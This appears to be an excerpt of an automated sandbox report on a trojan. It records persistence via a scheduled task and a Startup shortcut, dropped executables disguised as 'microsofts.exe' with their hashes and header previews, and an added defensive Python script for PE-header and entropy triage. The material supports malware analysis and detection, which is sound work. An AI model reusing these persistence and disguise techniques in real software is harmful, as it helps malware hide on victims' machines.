• Report size getting too big, too many NtDeviceIoControlFile calls found.
• Report size getting too big, too many NtOpenFile calls found.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtProtectVirtualMemory calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• Report size getting too big, too many NtReadFile calls found.
• Report size getting too big, too many NtSetInformationFile calls found.
• Report size getting too big, too many NtWriteFile calls found.
• VT rate limit hit for: AENiBH7X1q.exe
Time | Type | Description
11:02:52 | API Interceptor | 82x Sleep call for process: alg.exe modified
11:02:53 | API Interceptor | 688847x Sleep call for process: microsofts.exe modified
11:02:53 | API Interceptor | 19x Sleep call for process: powershell.exe modified
11:02:55 | API Interceptor | 331155x Sleep call for process: TrojanAIbot.exe modified
11:03:35 | API Interceptor | 199x Sleep call for process: msdtc.exe modified
17:02:54 | Task Scheduler | Run new task: AccSys path: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe
17:02:58 | Autostart | Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\TrojanAIbot.exe.lnk
Process: C:\Users\user\AppData\Local\Temp\microsofts.exe
File Type: PE32 executable (console) Intel 80386, for MS Windows
Category: dropped
Size (bytes): 1353216
Entropy (8bit): 5.324381662705354
Encrypted: false
SSDEEP: 12288:6C4VQjGARQNhipXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DB9:6OCAR0ipsqjnhMgeiCl7G0nehbGZpbD
MD5: C89A73FC07C14FA518734BBAD2B34525
SHA1: 4A01447E8D64E6BE57F136FD7B84ABCED55DADEF
SHA-256: 118709FE1B73EB6E0AD35FA16FE0E6E18FD5DDAB293DA17ED7EA3635F8251774
SHA-512: 432FB4C64E113D143EA8E221DFE3CADE113B8FC7F5CDF24EE34901FF389DF363C1A453BC48E68DF88EC4B1877F157C2012E0095352DC722AC26CDBF559D0A06B
Malicious: true
Antivirus:
• Antivirus: Avira, Detection: 100%
• Antivirus: Joe Sandbox ML, Detection: 100%
Reputation: unknown
Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........S.~.2.-.2.-.2.-n.G-.2.-n.E-J2.-n.D-.2.-.Z.,.2.-.Z.,.2.-.Z.,.2.-.J%-.2.-.2.-.2.-.[.,.2.-.[I-.2.-.2!-.2.-.[.,.2.-Rich.2.-........................PE..L...g.(c.....................6......&........0....@...........................!......K......................................,b..<....p...............................L..8............................L..@............0..,............................text............................... ..`.rdata...8...0...:..."..............@..@.data........p.......\..............@....rsrc....P...p...@...f..............@...................................................................................................................................................................................................................................................................................................................................
Process: C:\Users\user\AppData\Local\Temp\microsofts.exe
File Type: PE32 executable (GUI) Intel 80386, for MS Windows
Category: dropped
Size (bytes): 1294848
Entropy (8bit): 5.282692239633622
Encrypted: false
SSDEEP: 12288:3NUpaKghOXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:3CMKg4sqjnhMgeiCl7G0nehbGZpbD
MD5: 95350539C1E9EB379356A8C099771C80
SHA1: C3712BA12931134A42E1F96967212AAD840CDBEA
SHA-256: 748D7D2D2978EAB8880B519C63908C202CC89B683187322510BA3EF05C049E88
SHA-512: 885AB01351B97FA26FF16A6EA65982B9880C94A9F9BD08302A2334D5FB030B76F02BBBD5439F4961D6270DE72F63091D4F11C2A98C5D4D4153018EE9B900B372
Malicious: true
Antivirus:
• Antivirus: Avira, Detection: 100%
• Antivirus: Joe Sandbox ML, Detection: 100%
Reputation: unknown
Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........jZ..9Z..9Z..9...9Q..9...9%..9...9B..9...8r..9...8K..9...8H..9S.x9W..9Z..9..9...8]..9...9[..9Z.|9[..9...8[..9RichZ..9........PE..L...C.(c.........."......:...........\.......P....@........................... .............................................$...........0..............................8...............................@............P...............................text...19.......:.................. ..`.rdata...|...P...~...>..............@..@.data...............................@....rsrc...0...........................@..@.reloc...`...`...P...r..............@...........................................................................................................................................................................................................................................................................................................
Process: C:\Users\user\AppData\Local\Temp\microsofts.exe
File Type: PE32+ executable (GUI) x86-64, for MS Windows
Category: dropped
Size (bytes): 1314304
Entropy (8bit): 5.274129673178493
Encrypted: false
SSDEEP: 12288:4MEhwdbTFXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:CKdHFsqjnhMgeiCl7G0nehbGZpbD
MD5: 23C7E89737F9E6F55E286B6C620529F8
SHA1: 1C5891F24B7086086A6E141B3044BB218202353C
SHA-256: E69D7546DF9558348B06B6C4106940203F00489CCA78528C4E7061FECB88454A
SHA-512: 06C84D68E4C5745DF2EA45D9F5F0F2C97BEE0FAC26788493345182432F20D547327CF35EFDBE20439C2C5C9482D43D19BE5E5FA85660281966FBB208439458EC
Malicious: true
Antivirus:
• Antivirus: Avira, Detection: 100%
• Antivirus: Joe Sandbox ML, Detection: 100%
Reputation: unknown
Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........9..X...X...X..-....X..-....X..-....X...0...X...0...X...0...X... n..X...X..YX..<1.X..<1...X...Xj..X..<1...X..Rich.X..........................PE..d...G.(c.........."......J...^......Tr.........@............................. !......'.... .................................................,........ ..0...............................8............................................`..`............................text....H.......J.................. ..`.rdata.......`.......N..............@..@.data........ ......................@....pdata..............................@..@.rsrc...0.... ......."..............@..@.reloc...P.......@..................@...................................................................................................................................................................................................................................
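The dropped-file entries above give each image's "File Type" (PE32 vs PE32+, console vs GUI), its section names and its "Entropy (8bit)". All of that is recoverable from the first few hundred bytes shown in the Preview fields: "PE..L..." is the COFF Machine field 0x014C (i386) and "PE..d..." is 0x8664 (x86-64), the subsystem sits at a fixed offset in the optional header, and the entropy is the plain 8-bit Shannon figure over the file. The script below is an added example, not part of the Joe Sandbox report or of the sample: it parses those header fields from raw bytes, computes the entropy, and flags an image as likely packed when entropy exceeds a threshold. The threshold of 7.0 and the `build_sample_pe` helper that fabricates minimal, non-executable PE images for offline testing are assumptions of this example; the constructed samples are not the dropped files listed here.

```python
import math
import struct
from collections import Counter

# COFF Machine values. In a raw preview they appear as "PE..L..." (0x014C, bytes 4C 01)
# and "PE..d..." (0x8664, bytes 64 86), which is how the entries above can be told apart.
IMAGE_FILE_MACHINE_I386 = 0x014C
IMAGE_FILE_MACHINE_AMD64 = 0x8664
# Optional-header Magic and Subsystem values as defined by the PE format.
PE32_MAGIC, PE32PLUS_MAGIC = 0x10B, 0x20B
SUBSYSTEM_WINDOWS_GUI, SUBSYSTEM_WINDOWS_CUI = 2, 3
PACKED_ENTROPY_THRESHOLD = 7.0  # assumed rule-of-thumb cut-off, not a value taken from the report


def shannon_entropy(data: bytes) -> float:
    """8-bit Shannon entropy in bits per byte (0.0 .. 8.0), the 'Entropy (8bit)' figure above."""
    if not data:
        return 0.0
    n = len(data)
    return -sum((c / n) * math.log2(c / n) for c in Counter(data).values())


def parse_pe_header(data: bytes) -> dict:
    """Read e_lfanew, the COFF header, the optional-header magic/subsystem and the section names."""
    if data[:2] != b"MZ":
        raise ValueError("not an MZ image")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    # COFF file header: Machine, NumberOfSections, TimeDateStamp, PointerToSymbolTable,
    # NumberOfSymbols, SizeOfOptionalHeader, Characteristics (20 bytes).
    machine, nsections, _, _, _, opt_size, characteristics = struct.unpack_from(
        "<HHIIIHH", data, e_lfanew + 4)
    opt_off = e_lfanew + 24
    magic = struct.unpack_from("<H", data, opt_off)[0]
    subsystem = struct.unpack_from("<H", data, opt_off + 68)[0]  # offset 68 in both PE32 and PE32+
    sec_off = opt_off + opt_size
    names = []
    for i in range(nsections):  # each IMAGE_SECTION_HEADER is 40 bytes, name first
        raw = data[sec_off + 40 * i: sec_off + 40 * i + 8]
        names.append(raw.rstrip(b"\0").decode("ascii", "replace"))
    arch = {IMAGE_FILE_MACHINE_I386: "x86", IMAGE_FILE_MACHINE_AMD64: "x86-64"}.get(machine, hex(machine))
    fmt = {PE32_MAGIC: "PE32", PE32PLUS_MAGIC: "PE32+"}.get(magic, hex(magic))
    subsys = {SUBSYSTEM_WINDOWS_GUI: "GUI", SUBSYSTEM_WINDOWS_CUI: "console"}.get(subsystem, str(subsystem))
    return {
        "arch": f"{fmt} {arch}",
        "subsystem": subsys,
        "is_dll": bool(characteristics & 0x2000),  # IMAGE_FILE_DLL
        "sections": names,
    }


def triage(data: bytes) -> dict:
    """Header facts plus the entropy heuristic: high entropy suggests a packed or encrypted payload."""
    info = parse_pe_header(data)
    info["entropy"] = round(shannon_entropy(data), 3)
    info["likely_packed"] = info["entropy"] > PACKED_ENTROPY_THRESHOLD
    return info


def build_sample_pe(machine: int, magic: int, subsystem: int, section_names: list, body: bytes = b"") -> bytes:
    """Construct a minimal, non-executable PE image for offline testing (constructed data, not a real sample)."""
    opt_size = 0xE0 if magic == PE32_MAGIC else 0xF0
    dos = bytearray(0x80)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 0x80)  # e_lfanew: PE header immediately after the DOS area
    coff = struct.pack("<HHIIIHH", machine, len(section_names), 0, 0, 0, opt_size, 0x0002)
    opt = bytearray(opt_size)
    struct.pack_into("<H", opt, 0, magic)
    struct.pack_into("<H", opt, 68, subsystem)
    sections = b"".join(name.ljust(8, b"\0")[:8] + b"\0" * 32 for name in section_names)
    return bytes(dos) + b"PE\0\0" + coff + bytes(opt) + sections + body


if __name__ == "__main__":
    # Constructed inputs: a zero-padded x86 console image and an x64 GUI image with a uniform body.
    plain = build_sample_pe(IMAGE_FILE_MACHINE_I386, PE32_MAGIC, SUBSYSTEM_WINDOWS_CUI,
                            [b".text", b".rdata", b".data", b".rsrc"], b"\0" * 4096)
    dense = build_sample_pe(IMAGE_FILE_MACHINE_AMD64, PE32PLUS_MAGIC, SUBSYSTEM_WINDOWS_GUI,
                            [b".text", b".rdata", b".data", b".pdata", b".rsrc", b".reloc"],
                            bytes(range(256)) * 64)
    for label, sample in (("plain", plain), ("dense", dense)):
        print(label, triage(sample))
```

Run it against a real dropped file by reading the file's bytes and passing them to `triage`. Entropy alone is only a hint: the three ~5.3 entries above are plain compiled code, while the 7.647 entry at the end of this list is the kind of value that warrants unpacking before static analysis.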
Process: C:\Users\user\AppData\Local\Temp\microsofts.exe
File Type: PE32 executable (GUI) Intel 80386, for MS Windows
Category: dropped
Size (bytes): 2203136
Entropy (8bit): 7.647023602416916
Encrypted: false
SSDEEP: 49152:mK0eqkSR7Xgo4TiRPnLWvJRDmg27RnWGj:mK0pR7Xn4TiRCvJRD527BWG
MD5: 0621B7A5FA2B037D9B922E8D68C34689
SHA1: 74FEA694A9F139CDEB61FF617E1903EA658BFF1C
SHA-256: A2BDDDD4125E021D1C78646E11738BC2E70FA7519D6B28C382C6ED6EF02097BA
                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:1C85219F80414578BF575C7D9B2C211FC58913D949A022291D4EA0B1E17C2BDEB48FF15D6675561301212AEA592E971373C0840A84898EAB368686453428086D
                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                                                                                                                                                                                              • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                                                                              Reputation:unknown
Process: C:\Users\user\AppData\Local\Temp\microsofts.exe
File Type: PE32+ executable (GUI) x86-64, for MS Windows
Category: dropped
Size (bytes): 2369024
Entropy (8bit): 7.565055605190179
Encrypted: false
SSDEEP: 49152:hfYP1JsEDkSR7Xgo4TiRPnLWvJRDmg27RnWGj:RYPBR7Xn4TiRCvJRD527BWG
MD5: 1881841B389BB748D753DEC529898B64
SHA1: 859A6A5DE667BE0408E0A9BAA845CEA744A7541D
SHA-256: 9C3BE021ADEB39AD914B2AAD426E5C15F6657BC054E8A91642B43F07A0C4D35B
SHA-512: C680A51863E684881C1887972562CD26B7B0A13FA7B3DACB04E6682C81B1C197BF12F65C700A39260DC785038D88F07C2BCE4A399606A5CB74E552ACC2C2FFC9
Malicious: true
Antivirus:
• Antivirus: Avira, Detection: 100%
• Antivirus: Joe Sandbox ML, Detection: 100%
Reputation: unknown
Process: C:\Users\user\AppData\Local\Temp\microsofts.exe
File Type: PE32 executable (GUI) Intel 80386, for MS Windows
Category: dropped
Size (bytes): 1245184
Entropy (8bit): 5.123553567266901
Encrypted: false
SSDEEP: 12288:L62SYUcknnDXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3b:gYUcknDsqjnhMgeiCl7G0nehbGZpbD
MD5: 2306907FB62205C9B663C6AC1A29197A
SHA1: 5E14615B0D365AF74185011FE5374D5D56752701
SHA-256: 9BB83B1E97566584DF95FFF8814C7EA1615E1077D43A5A01622B7E5ECEB45596
SHA-512: 9EB0B0BC8A74BC351A622D5CD43BD1C9356C0E33F1AFC732D21AC11C6590A2626657DF6C205FCAE92F64E169E9AA8DC933B1F18E3AEB1707CE63AA99D1774ECC
Malicious: true
Antivirus:
• Antivirus: Avira, Detection: 100%
• Antivirus: Joe Sandbox ML, Detection: 100%
Reputation: unknown
Process: C:\Users\user\AppData\Local\Temp\microsofts.exe
File Type: PE32+ executable (GUI) x86-64, for MS Windows
Category: dropped
Size (bytes): 1640448
Entropy (8bit): 7.166650096045539
Encrypted: false
SSDEEP: 49152:X+iAqSPyC+NltpScpzbtvpJoMQSq/jrQaSlDmg27RnWGj:9SktbpHD527BWG
MD5: 843605846E5764C8315C47356EE24D34
SHA1: 7D5A223CB395CCC8D09681885BEAD63D9F2F4BC2
SHA-256: 356D41707C9CE6F4BF0BC076D2A9812DF069B3B26829DB781E8F1B658664C0D2
SHA-512: F266CE39AEE6DE747C4776A723417A524553FE9BC74BC9AD7D070DB381723F9FB7DE72FEDFEB7E7105D4C4354254EC2E640F63A38E87F0E737ED34A1B8F7C6D6
Malicious: true
Antivirus:
• Antivirus: Avira, Detection: 100%
• Antivirus: Joe Sandbox ML, Detection: 100%
Reputation: unknown
Process: C:\Users\user\AppData\Local\Temp\microsofts.exe
File Type: PE32 executable (GUI) Intel 80386, for MS Windows
Category: dropped
Size (bytes): 2953728
Entropy (8bit): 7.094603860303217
Encrypted: false
                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:49152:FGSXoV72tpV9XE8Wwi1aCvYMdVluS/fYw44RxLaDmg27RnWGj:Z4OEtwiICvYMRf6D527BWG
                                                                                                                                                                                                                                                                                                                                                                                                              MD5:A723B41A340C0CF5C8A287E697EF77BD
                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:8891871D4CFB6A1381D809A52B54651B9E074090
                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:416D293F860D0D04DA2F89A9A092B4328AEB9783EB369DBA5A4897ADD144DF65
                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:3F23C054BEB5356774825E040A003EDED0744767391CAE22AC15F065FF87583F4A9132CC8CAC21D8A8C1F3EBFC1A1B7E16543A899A2C51F0EEAE03EC61F10A61
                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                                                                                                                                                                                              • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........Ark.Ark.Ark...o.Mrk...h.Jrk...n.^rk...j.Erk.H...Brk.H...nrk.Arj..pk...b.rk...k.@rk.....@rk...i.@rk.RichArk.........................PE..L.....(c.....................~....................@..........................P-.....;4-.............................p...<............@ .............................@...p...................P...........@............................................text...e........................... ..`.rdata...^.......`..................@..@.data...`....0......................@....rsrc........@ ....... .............@..@.reloc.......P#......"#.............@...................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\microsofts.exe
                                                                                                                                                                                                                                                                                                                                                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):1485824
                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.496391618897693
                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:24576:lAMuR+3kMbVjh5sqjnhMgeiCl7G0nehbGZpbD:iD+lbVjh9Dmg27RnWGj
                                                                                                                                                                                                                                                                                                                                                                                                              MD5:ED1FE1E559DAFDA264F1980EB1AE7B49
                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:FA53519BFBD082D92C6E3620A7BB768F4AD9DFDC
                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:CFD9201DECC3A9E82FE518589D153D74E846CBF2F3DC35A4952B6C95EF6E20FA
                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:CBE72243F7E26FAD4F7780116B7416D89905B937E805198959FAFB60193FD9B51E93152187A4C8A7D67BE3CF1A512B45322618BAA2574B91B9B67D9967F30109
                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                                                                                                                                                                                              • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........4...Uu..Uu..Uu..=v..Uu..=q..Uu..=p.pUu..=s..Uu..8q..Uu..8v..Uu..8p.@Uu.....Uu..=t..Uu..Ut..Wu.Z;p..Uu.Z;...Uu..U...Uu.Z;w..Uu.Rich.Uu.................PE..L......d.................N...P...............`....@..........................................................................`..@.......(...............................T...............................@............`..L............................text...zL.......N.................. ..`.rdata.......`.......R..............@..@.data...\D...........p..............@....rsrc...(...........................@..@.reloc...........p...<..............@...................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                                                                                                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                              Category:modified
                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):1290240
                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.277756438902528
                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:12288:IImGUcsvZZdubv7hfl3NXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wlb:IxGBcml9sqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                                                                                                                                                                                                              MD5:8EDA018E049620D65BF7CDB965F5B5BB
                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:37629A11BB7AD6BE8545F40AEBEF40676822DC6F
                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:F9C4EE7787C388B0F1873CAEB0515D872813CC4CBD074609719BB9284CEBFF67
                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:90C948903FA8D39743D82E51B5DC0A52CB1838FDBE73A1E65238650BFC48FAB925B2EE775750FA6FB41A97213C74A586793AC788380EC20F129C1982C0D86C1B
                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                                                                                                                                                                                              • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........]...3...3...3...0...3...6.h.3.,.7...3.,.0...3.,.6...3...7...3...2...3...2.G.3.e.:...3.e....3.....3.e.1...3.Rich..3.................PE..L...}..d..........................................@.................................@8......................................`D......................................@...p...........................p...@....................B.......................text.............................. ..`.rdata..t...........................@..@.data........`.......@..............@....didat..4............N..............@....rsrc................P..............@..@.reloc...`.......P...`..............@...........................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\microsofts.exe
                                                                                                                                                                                                                                                                                                                                                                                                              File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):1644544
                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.694795213808657
                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:24576:u0vHyeLj8trn3wszsqjnhMgeiCl7G0nehbGZpbD:/tj4rgs3Dmg27RnWGj
                                                                                                                                                                                                                                                                                                                                                                                                              MD5:185661426251F556123EE7C18139947A
                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:49EE100B7663620AE97FF890B913A42283D28BBF
                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:D4BE76DF8D85607A4CF45EC2159C147799F97E9EBEA5D59D93EFD38A5DD102E3
                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:8F0722508DE3CC519F0D1B5C865AFAAF13746B9C200AFCCC0DBD7E731E7BFB07DFF00AB6F956B3D1C3F801750D6A8B6A0749F4935F0688305520BD81D1F061D4
                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                                                                                                                                                                                              • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                                                                              Reputation:unknown
Process: C:\Users\user\AppData\Local\Temp\microsofts.exe
File Type: PE32 executable (GUI) Intel 80386, for MS Windows
Category: dropped
Size (bytes): 1781760
Entropy (8bit): 7.279659127389356
Encrypted: false
SSDEEP: 24576:/oMOW0n7Ubxk/uRv5qLGJLQ4a56duA/85RkV4l7/ZGsqjnhMgeiCl7G0nehbGZpv:W4i0wGJra0uAUfkVy7/ZKDmg27RnWGj
MD5: 13BE8D62222F89D81DB4E1A0832C9F95
SHA1: 29EB17F5C5E1BA82719936F3D68A5A62E8C2D0DB
SHA-256: A095775E03DB8624EB1D9922BE34B6A9D2E363F0AA2F0F23B2C62601D214C5D4
SHA-512: 0CB8F315F748C89063BD16A187BAFFDB5277658643DA4F8B273616EEB02FCDC1842C192EF52DB69322236CED8A7787997A5A4DF3AEF92D603C2F3940A25D285B
Malicious: true
Antivirus:
• Antivirus: Avira, Detection: 100%
• Antivirus: Joe Sandbox ML, Detection: 100%
Reputation: unknown
Process: C:\Users\user\AppData\Local\Temp\microsofts.exe
File Type: PE32 executable (GUI) Intel 80386, for MS Windows
Category: dropped
Size (bytes): 1318400
Entropy (8bit): 7.448741313363
Encrypted: false
SSDEEP: 24576:WeR0gB6axoCf0R6RLQRF/TzJqe58BimBsqjnhMgeiCl7G0nehbGZpbD:SgHxmR6uBTzge5MimVDmg27RnWGj
MD5: 3526371DB6572E0ECDA5035B75799941
SHA1: D24393425FDF63F962C3E64EF9D735ECD3FF02D3
SHA-256: 86A7CD302C3DE2F9FC1EA97BA2A71FF48F242919BF0273D6F58F5C7C95D4E28C
SHA-512: DDBF4CFAE1AABD1E36646D3137F2985902B4FEED77B9B5EA2EC0E642B0451DAD62DA5BD38636BAAC0C1C0AFA8321AD8139A7F2BC63AAD47FE2FDE624BB7D488D
Malicious: true
Antivirus:
• Antivirus: Avira, Detection: 100%
• Antivirus: Joe Sandbox ML, Detection: 100%
Reputation: unknown
Process: C:\Users\user\AppData\Local\Temp\microsofts.exe
File Type: PE32 executable (console) Intel 80386, for MS Windows
Category: dropped
Size (bytes): 1375232
Entropy (8bit): 5.446059826291047
Encrypted: false
SSDEEP: 12288:UnEbH0j4x7R6SvyCMjXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/nT:UkwOtO7jsqjnhMgeiCl7G0nehbGZpbD
MD5: A55043CAC8BDEE9902AB2AB41C671FF8
SHA1: 25D1773A644E1DDCC54B5D9C4283A09530B72B30
SHA-256: 17D2147C3D9872A139D0F8A45241550536B058FD1FF78E4CB2AE619DB43C8053
SHA-512: 7BF6AA70AAACB48D224F0A5725CB9421F8F6F3B6B55EE71D8987468AA04F9C6EDED4F3476514BA3E9642E044C27E01627255D7A0969BE635891A3BAC8EF1C857
Malicious: true
Antivirus:
• Antivirus: Avira, Detection: 100%
• Antivirus: Joe Sandbox ML, Detection: 100%
Reputation: unknown
Process: C:\Users\user\AppData\Local\Temp\microsofts.exe
File Type: PE32 executable (GUI) Intel 80386, for MS Windows
Category: dropped
Size (bytes): 1375232
Entropy (8bit): 5.446808895916091
Encrypted: false
SSDEEP: 24576:anU/h/4KAsqjnhMgeiCl7G0nehbGZpbD:aU/V8Dmg27RnWGj
MD5: F463B7AEC4E31D1415E9E254B05AEF59
SHA1: 1A45E660EACDE2D750A8A5FCA75A99248AED934D
SHA-256: F7473F9D9FA6DDD61B7029F5A7E67EE69790FFE7F69890E0B285B22DB2C51CC2
SHA-512: 558B85BAEF1878A69D809A3D53AB5D8E95E3B6A24D1DC14C58C03E7D4DE21176AE8515AC6D46485756AF34114C35B4E0011C6F2E381E7C8B86152C547D55D4B0
Malicious: true
Antivirus:
• Antivirus: Avira, Detection: 100%
• Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:unknown
Process:C:\Users\user\AppData\Local\Temp\microsofts.exe
File Type:PE32 executable (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):1513984
Entropy (8bit):5.483734536968897
Encrypted:false
SSDEEP:24576:Jx71iBLZ05jNTmJWExfsqjnhMgeiCl7G0nehbGZpbD:JxhiHIjNgDDmg27RnWGj
MD5:C8E7348AA892774FA4FD0A5D4C92D2A3
SHA1:6D726277AE3D00CA0F36E7AF3E0F5B0408E849FA
SHA-256:E37DF8E4BCBFBE3869B9461F776DF6443063B881815DB4FEC69E0C7509ABF7A3
SHA-512:EF65B18B0A930348CADC83C6EBA11B33C5E4B36E54BDB83255393C184DED06E4B3DD56FE660BF39F95E9253368CFEEDE2140F908E3FFC5504AD75FA75003B0DE
Malicious:true
Antivirus:
• Antivirus: Avira, Detection: 100%
• Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:unknown
Process:C:\Users\user\AppData\Local\Temp\microsofts.exe
File Type:PE32 executable (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):1419264
Entropy (8bit):5.466699531616397
Encrypted:false
SSDEEP:24576:WlnRklQ6fgJcEwix5sqjnhMgeiCl7G0nehbGZpbD:yoRfgJcEwC9Dmg27RnWGj
MD5:FEF4EF6658FB944B44687D6086009712
SHA1:5A506085FA0FEA916E425D7484E3B76A416B9082
SHA-256:AF6771B72196F6F48EE170E6C027BC42B4F7795DD9A66EFDD0D4B899BC7F1467
SHA-512:F75086768A840F4B0C87F10D9818D144AF92F1CB3D82BBC134918799A0CBD6B02F5B089B09698DCBB61BF10AA50041E8023D97280919C135DB98E983CE9608F5
Malicious:true
Antivirus:
• Antivirus: Avira, Detection: 100%
• Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:unknown
Process:C:\Users\user\AppData\Local\Temp\microsofts.exe
File Type:PE32+ executable (GUI) x86-64, for MS Windows
Category:dropped
Size (bytes):1522176
Entropy (8bit):5.49651774077761
Encrypted:false
SSDEEP:24576:yW25k8hb0Haw+xJsqjnhMgeiCl7G0nehbGZpbD:yWyk8SHawmNDmg27RnWGj
MD5:50F516A22047EBE78859D3A0297D423A
SHA1:D3A96E3F2638BA53EE012B460A9B295056639220
SHA-256:38DF6979E5E97A93E252256B4A5ACB203C8CE1120434502D15E677EAED543EC1
SHA-512:563E7C4F3B3CCCF1F74AA6EB536D1271991AA70AEB7445BF204CDBD4EA5F864C79645675459F48DEE7D334D187F882CD2AEC635BCE931B7294A500956130ED91
Malicious:true
Antivirus:
• Antivirus: Avira, Detection: 100%
• Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:unknown
Process:C:\Users\user\AppData\Local\Temp\microsofts.exe
File Type:PE32 executable (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):1282048
Entropy (8bit):5.163943295242343
Encrypted:false
SSDEEP:12288:EWP/aK2vB+KXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3b:EKCKABxsqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                                                                                                                                                                                                              MD5:07EE3710F13662D50451BB21858587DA
                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:CE91E07D290E2D9287D2FFE323A726EBB5C9A35C
                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:522A51A302BF80442F9D745A685DF1FC8EA53E54AC7EBF35968ECFEAE85E683B
